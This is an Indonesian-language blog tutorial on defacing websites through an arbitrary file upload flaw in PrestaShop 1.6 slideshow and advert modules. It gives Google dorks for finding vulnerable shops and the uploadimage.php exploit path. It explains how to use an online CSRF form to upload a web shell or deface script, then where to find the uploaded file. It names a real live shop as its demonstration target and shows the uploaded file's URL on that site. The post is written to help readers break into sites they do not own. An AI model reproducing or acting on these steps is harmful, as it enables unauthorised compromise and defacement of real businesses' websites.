Cara Deface Metode Responsive Prestashop 1.6 Arbitrary File Upload


Assalamualaikum Wr Wb
kembali lagi bersama saya yang gans ini 😁
kali ini saya akan memberikan tutorial deface metode
"Responsive Prestashop 1.6 Arbitrary File Upload"

oke langsung gaskeunn...
Bahan

1. Dork : inurl:"/modules/simpleslideshow/"
               inurl:"/modules/productpageadverts/"
                   inurl:"/modules/homepageadvertise/"
                   inurl:"/modules/columnadverts/"
2. Exploit : /uploadimage.php
3. CSRF :  CSRF ONLINE
4. Shell backdoor atau script deface
5. Sabar 😂

- Dorking dengan dork diatas tapi disini saya ada live target "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/"
- Lalu masukan exploit nya jadi seperti ini
"http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/uploadimage.php"
- Jika ada tulisan error seperti ini.
- itu tandanya vuln tinggal kita masukan sitenya ke CSRF seperti gambar di
bawah ini, dengan POSTFILE : userfile 

 - lalu klik submit, setelah itu pilih file yang ingin kalian upload lalu klik upload

-Jika berhasil maka akan muncul "success:namafilekalian.extensi" seperti di gambar di bawah
- Lalu tinggal kita akses, dimana aksesnya ??, yaitu di
  "/modules/namamodules/slides/filekalian"
- Seperti ini "http://laurarosetextiles.co.uk/shop/modules/homepageadvertise/slides/luv.gif"
- Dan yap kita sudah berhasil

ok mungkin cukup sekian tutorial dari saya
see you on the next tutorial and peaceee 😋

0 Response to "Cara Deface Metode Responsive Prestashop 1.6 Arbitrary File Upload"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel